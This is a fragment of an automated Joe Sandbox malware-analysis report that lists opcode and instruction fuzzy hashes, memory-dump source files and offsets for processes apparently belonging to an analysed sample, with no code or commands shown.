                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c74515081dd1ebc737cd9811a125e6187be5346c2020271225d9c360d7c5b88
                                                            • Instruction ID: 8fc0bca99b62448a0ca64601f08bc1ba3435813f57bb156b70a1850d0f25f9b8
                                                            • Opcode Fuzzy Hash: 6c74515081dd1ebc737cd9811a125e6187be5346c2020271225d9c360d7c5b88
                                                            • Instruction Fuzzy Hash: 6C014213F0CA9B4FE7B8EBA884225B827B5EF15350B0003FAD04AD65C3FD08B9468249
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 98250fafcb50043b7872c610f863b943a11a66443cfd4e048ec0131cd874dbee
                                                            • Instruction ID: 59f41b542556ebce44c2e82d21cf349ac94517e63fb33c7db487b8a682ccf89f
                                                            • Opcode Fuzzy Hash: 98250fafcb50043b7872c610f863b943a11a66443cfd4e048ec0131cd874dbee
                                                            • Instruction Fuzzy Hash: D001F770E0E68E8FE721EBA4C8602ED7770EF95314F044676D555972E2DE786304CB45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d83d8d0c1c59087cb5a889a77c0f697ae21b3e94689369ec9cfb63f9472c7e70
                                                            • Instruction ID: 883d16d173472a86e850c4dd6741178075a236159d78cffef0dd22e3570eb24a
                                                            • Opcode Fuzzy Hash: d83d8d0c1c59087cb5a889a77c0f697ae21b3e94689369ec9cfb63f9472c7e70
                                                            • Instruction Fuzzy Hash: 8F11E671A0592D8AEB74DB54CCA86E877B1EF94305F0102EA900DA62A5CB792E85CF84
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 54290c5010905a4e233c81679240057d2496b958a4a22225e2ea7847065840ca
                                                            • Instruction ID: 086230738365d1b822a9f5f19f44b9c2e2b4226b80dedbaa6a6ec5373d4c001b
                                                            • Opcode Fuzzy Hash: 54290c5010905a4e233c81679240057d2496b958a4a22225e2ea7847065840ca
                                                            • Instruction Fuzzy Hash: E501BB7091490E8FDF84EF58C858ABE7BF0FB68305F10456AA41DD3254DB70A690CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 58c17072dbacdf9c772e1a491227b2e76f3ba1984134972135a49b62149be536
                                                            • Instruction ID: 17975965daf7fdb36e4185998a924c8754890a4ac3dbc47b1ceea578ea84df7d
                                                            • Opcode Fuzzy Hash: 58c17072dbacdf9c772e1a491227b2e76f3ba1984134972135a49b62149be536
                                                            • Instruction Fuzzy Hash: 46116670D1652D9EEBB4DB54C8A47EDB6B2EBA4301F1101E9D00DA32A1CEB62BD4CF45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f102b17ef6ca6079029837882f61e12be75047c88258d3879e9462a0da82b325
                                                            • Instruction ID: d590d9248aca253f29bc8d41fdd47234d89a095721768f588319fbdfd2c79159
                                                            • Opcode Fuzzy Hash: f102b17ef6ca6079029837882f61e12be75047c88258d3879e9462a0da82b325
                                                            • Instruction Fuzzy Hash: 4AF0C83284E2C69FD7239BB0C8714D53FB0AF43240B0501F6E445C70A2D66D1616C762
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5445e1dc992951396930eaf1cc225443cc8c11626cdf19fa567c0b75a7d526b2
                                                            • Instruction ID: 4683397bea6effabd4798992f67d4d010d2223350d2cc50dbbaec618ad055804
                                                            • Opcode Fuzzy Hash: 5445e1dc992951396930eaf1cc225443cc8c11626cdf19fa567c0b75a7d526b2
                                                            • Instruction Fuzzy Hash: F9F03030A0950E9FEB60EF98D4596FD77A0FFA8704F514536E41CC21A0DAB46690CB84
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5af1cae38a815c917ebc91a49e8159e765fdcd75fdcbbeff5c189ace30fc30ab
                                                            • Instruction ID: 00a5c1fe4150efb7b7e2344e975772e5fbbe615208a56ba8e66d5dafb2ecf4c4
                                                            • Opcode Fuzzy Hash: 5af1cae38a815c917ebc91a49e8159e765fdcd75fdcbbeff5c189ace30fc30ab
                                                            • Instruction Fuzzy Hash: 16F0F930914A4E8FDB50EF68C849AEA7BF0FF28349F50456AE818D2154DB34A1A0CB81
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4119383aa9712a7fb4f8736392d11a51118d8ad522ead39c560e6b66caeeb913
                                                            • Instruction ID: 448c575b58d0faf598009b86b4c535dbffa7830047f0a2b3fbbcbafe76b34b61
                                                            • Opcode Fuzzy Hash: 4119383aa9712a7fb4f8736392d11a51118d8ad522ead39c560e6b66caeeb913
                                                            • Instruction Fuzzy Hash: A0F090B1F0854E4BF754EFA888766ADB7B1EF64358F000035E059DB29ACE7878428741
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42b1648d3ab2de70b3d8a7d00c8a1d6987573fa70eb48636ab00ac7be595783b
                                                            • Instruction ID: 5ddc262ed1f10da21a5b7abb284020bc699819be510d9add13288dd24ee8e578
                                                            • Opcode Fuzzy Hash: 42b1648d3ab2de70b3d8a7d00c8a1d6987573fa70eb48636ab00ac7be595783b
                                                            • Instruction Fuzzy Hash: AAF01230A1554E9FDF90EF64C4596FE77E0FF58304F414576E81CD2160DA70A6A0CB80
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction ID: 000b590d6d06b647d61607921931abdab0c09c44f5fcfabad5ceb1ef67b6e18e
                                                            • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                            • Instruction Fuzzy Hash: BBF0B27490A9599FCB55EAA8C85AE99BBB0FF68310F10029DD00AEB262CA219845CF40
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction ID: 892b278ea6e4599c6bd6d3c96a92942b25519fedc7163ef9ea4723b1c3f007a6
                                                            • Opcode Fuzzy Hash: 80338b6ba67a754664934a6ac6536264d23993a6ff0ca8e203410fc86db4f8e6
                                                            • Instruction Fuzzy Hash: 26F07D70E1A51D8EEB74DB54C868BEDB771EB94300F1141F9D10EA6292CAB41F81CF04
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8c40623735b0350bb64603304fc5358aa96462f1f01dbeb35e906952813bc808
                                                            • Instruction ID: 415b84aafa3d469d2337b5fb5160cbbe9704da8bb00e756a6ee44106c6e55051
                                                            • Opcode Fuzzy Hash: 8c40623735b0350bb64603304fc5358aa96462f1f01dbeb35e906952813bc808
                                                            • Instruction Fuzzy Hash: 9DE04630A04A0E8FDB94EF54E9066EA77A0FF68308F004A26E85CC3184CB74A664CBC1
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7f7a287bd8fffec358b2585448bd48a42e2eaf1678066a17b37eb9cfd427c94
                                                            • Instruction ID: 0a2c12a8da1055686c993e07d30c9cb31750d7852a056ce9bb6db96d375a6222
                                                            • Opcode Fuzzy Hash: e7f7a287bd8fffec358b2585448bd48a42e2eaf1678066a17b37eb9cfd427c94
                                                            • Instruction Fuzzy Hash: CBE0DF32D1D38A8BD771CB60C8660EC7F30BF00340F1802EBE94867182FB386708A682
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9aca51ecb88904339a749a9ce3cb7e4982f025504acc00b4ab4a116747e51da
                                                            • Instruction ID: 6484ee9b31c563a2993a0368d916fea88ad2488cf6f4e3bb33ee5308918831e2
                                                            • Opcode Fuzzy Hash: a9aca51ecb88904339a749a9ce3cb7e4982f025504acc00b4ab4a116747e51da
                                                            • Instruction Fuzzy Hash: 0AE08652F0D2835BF736177448611747BA08F0728471907B5D1455A1C3D85438049325
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b8796cffa75c086d6a141a462acccb19af0f2cfa4ca217529d88f05791274ac
                                                            • Instruction ID: 319a5c72353212c8d6569e37238a0bf7cf4ade93ca2c8f63c3c0b6840c994f34
                                                            • Opcode Fuzzy Hash: 7b8796cffa75c086d6a141a462acccb19af0f2cfa4ca217529d88f05791274ac
                                                            • Instruction Fuzzy Hash: 24D0C912F0DA1785FA3D5AD1807423E51B05F507A1F7446BED19FA18C2EF1C7505A20A
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction ID: b8b4f45cfec7e62f09eb2e3c7bf5458c598b1687d08470d10aed2c57eef548d8
                                                            • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                            • Instruction Fuzzy Hash: 91D0C912F1DA1785F9396AD1803033951B55F00780E2446BEC19F618C1ED2CB402622A
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction ID: f5c2ccf946551d72e7a91d812c673509043b37f505a05de0a35f6952e26dabc0
                                                            • Opcode Fuzzy Hash: 29210b269bf62c383f94fd596668a6377e2401db163769ff28296a7d212c356a
                                                            • Instruction Fuzzy Hash: 91D05E34D0602DADEB748B40C9703F871A19FE0300F0501F9C00D221A1CEB92BC08E45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction ID: f5c2ccf946551d72e7a91d812c673509043b37f505a05de0a35f6952e26dabc0
                                                            • Opcode Fuzzy Hash: 7bc853f4a39b1b3a7627dd885057a2eeb11b1191bd395fd6a25a76276556f71e
                                                            • Instruction Fuzzy Hash: 91D05E34D0602DADEB748B40C9703F871A19FE0300F0501F9C00D221A1CEB92BC08E45
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                            • Instruction ID: ce2181ed8ae71951777afee632c39d82eee517e85b487d812b97d97ee3a05f1f
                                                            • Opcode Fuzzy Hash: 5c26eba563a26d91e49756930272b7e561ce193f96bf6709cf5e85e169b1e10d
                                                            • Instruction Fuzzy Hash: 3EC08C22E0C6438FF2356BA5C03133537B19F02380F2046FAC48E5A4D2DD3839429266
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f976b32be169b52cdb1f329495586d7ab9168eb0251469307a0bea8ffb4f447b
                                                            • Instruction ID: 040bb840ea05a1c274addac95ec3846e1a2a86e915d362b91082e2076feaa3b0
                                                            • Opcode Fuzzy Hash: f976b32be169b52cdb1f329495586d7ab9168eb0251469307a0bea8ffb4f447b
                                                            • Instruction Fuzzy Hash: 3AC08C02F0D2438BE23422F448B003C12B00F07241B240EB1C10B9A2C3E98878005214
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4235117589.00007FFD9C1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c1d0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0bda3b40914ef7fc56c4aff19c97738bfd278a9df348926678cd3063bfa8a8ef
                                                            • Instruction ID: 84de606015a4d73c4bde9d14109d1671a3e53971ab84656007586d273cd8b035
                                                            • Opcode Fuzzy Hash: 0bda3b40914ef7fc56c4aff19c97738bfd278a9df348926678cd3063bfa8a8ef
                                                            • Instruction Fuzzy Hash:
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000011.00000002.2081187519.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_17_2_7ffd9baa0000_services.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420